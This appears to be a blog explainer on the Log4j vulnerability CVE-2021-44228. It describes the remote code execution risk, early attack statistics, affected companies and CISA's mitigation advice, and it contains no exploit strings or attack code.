Log4j: The Security Vulnerability that Could Affect the Entire Internet
The Context
Last week, the non-profit organization Apache Software Foundation disclosed a critical vulnerability in its Log4j software. This announcement caused widespread panic across private sector companies and government agencies, and cybersecurity professionals across the world have been racing to address the flaws. The vulnerabilities within Log4j, a widely used software that allows developers to record the activities of applications and online services, puts hundreds of millions of devices at risk of being targeted in large-scale cyberattacks. The Log4j vulnerability is one of the most severe cases the world has yet seen, and the cybersecurity community has already assigned it a criticality score of 10 out of 10.
What exactly is Log4j?
Log4j is a popular Java software library used by developers for logging errors in applications and systems. This form of activity logging helps software developers review error messages and address issues. Log4j was developed by the Apache Software Foundation and is one of the most widely used logging tools in corporate networks, applications, and webpages.
How can hackers exploit the Log4j vulnerability?
The recently discovered flaws in Log4j, known in the cyber world as CVE-2021-44228, makes it easy for cybercriminals to exploit and gain control of servers. More specifically, CVE-2021-44228 allows unauthenticated users to execute code remotely on a targeted device. This means that attackers can bypass security controls on a computer and take control, exfiltrate data, or infect the device with malware. CVE-2021-44228 is a zero day, meaning it is a software vulnerability for which a patch has not yet been developed. Until cybersecurity professionals around the world develop methods of addressing this critical flaw, hackers will be able to exploit it and potentially wreak havoc on the global internet.
Have hackers already taken advantage of the flaw?
Within a few hours, many attackers were attempting to exploit CVE-2021-44228. The cybersecurity company Check Point recorded over 800,000 cyberattacks which occurred a mere 72 hours following the public announcement of the Log4j vulnerability. Additionally, Check Point estimated that malicious groups had attempted to exploit nearly 50% of customers’ global corporate networks. In fact, evidence suggests that hackers discovered the flaws days before they were publicly disclosed. According to the Cloudfare’s CEO Matthew Prince, attackers had exploited the Log4j vulnerabilities as early as December 1, 2021.
Which devices are affected by CVE-2021-44228?
In short, any device, application, or system that utilizes Log4j software is at risk. We know that Log4j has been downloaded hundreds of millions of times, but it is difficult to ascertain exactly how many systems have been affected. This is because Log4j is installed in numerous different pieces of software, so it is impossible to quantify its magnitude. That being said, here are some of the major technology companies that have been affected so far:
Okta
Palo Alto Networks
Twitter
VMware
Apple
Amazon Web Services (AWS)
Cisco
IBM
Microsoft’s Minecraft
What can users do to protect themselves?
Below is some guidance given by Apache Software Foundation, large tech companies such as Microsoft, and the US Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly:
Determine all devices that have Log4j installed, especially those which are Internet-facing.
Ensure that security teams are implementing alerts on these devices.
Install a web application firewall (WAF) with guidelines that are automatically updated in order to streamline alerting.
Ensure that organizations upgrade their Log4j tools to the latest version (Log4j 2.12.2 for Java 7 and 2.16.0 for Java 8).
Limit the amount of external internet traffic and disable any unnecessary services in order to reduce the attack surface on your device.
To read the full guidance from CISA regarding the Log4j vulnerability, click on this resource for further details.